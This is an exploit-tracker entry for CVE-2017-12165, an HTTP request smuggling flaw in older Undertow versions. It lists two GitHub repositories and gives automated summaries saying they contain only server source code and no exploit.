CVE-2017-12165

LOW

Undertow <1.4.17, <1.3.31, <2.0.0 - HTTP Request Smuggling

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2017-12165. PoCs published by dawetmaster, andikahilmy.

AI-analyzed exploit summary The repository contains only the source code of Undertow, a Java web server, without any exploit code or technical analysis related to CVE-2017-12165. The README provides no details about the vulnerability or how to exploit it.

Description

It was discovered that Undertow before 1.4.17, 1.3.31 and 2.0.0 processes http request headers with unusual whitespaces which can cause possible http request smuggling.

Exploits (2)

nomisec STUB

by dawetmaster · poc

https://github.com/dawetmaster/CVE-2017-12165-undertow-vulnerable

View Code ZIP pw:eip

The repository contains only the source code of Undertow, a Java web server, without any exploit code or technical analysis related to CVE-2017-12165. The README provides no details about the vulnerability or how to exploit it.

Classification

Stub 90%

Attack Type

Other

Complexity

Trivial

Reliability

Theoretical

Target: Undertow (version not specified)

No auth needed

Prerequisites: none

MITRE ATT&CK

T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Mar 14, 2026 Full analysis →

nomisec STUB

by andikahilmy · poc

https://github.com/andikahilmy/CVE-2017-12165-undertow-vulnerable

View Code ZIP pw:eip

The repository contains a partial snapshot of the Undertow web server source code but lacks any exploit code or technical analysis related to CVE-2017-12165. The README is a generic description of Undertow without vulnerability details.

Classification

Stub 90%

Attack Type

Other

Complexity

Theoretical

Reliability

Theoretical

Target: Undertow (version unspecified)

No auth needed

devstral-2 · analyzed Feb 18, 2026 Full analysis →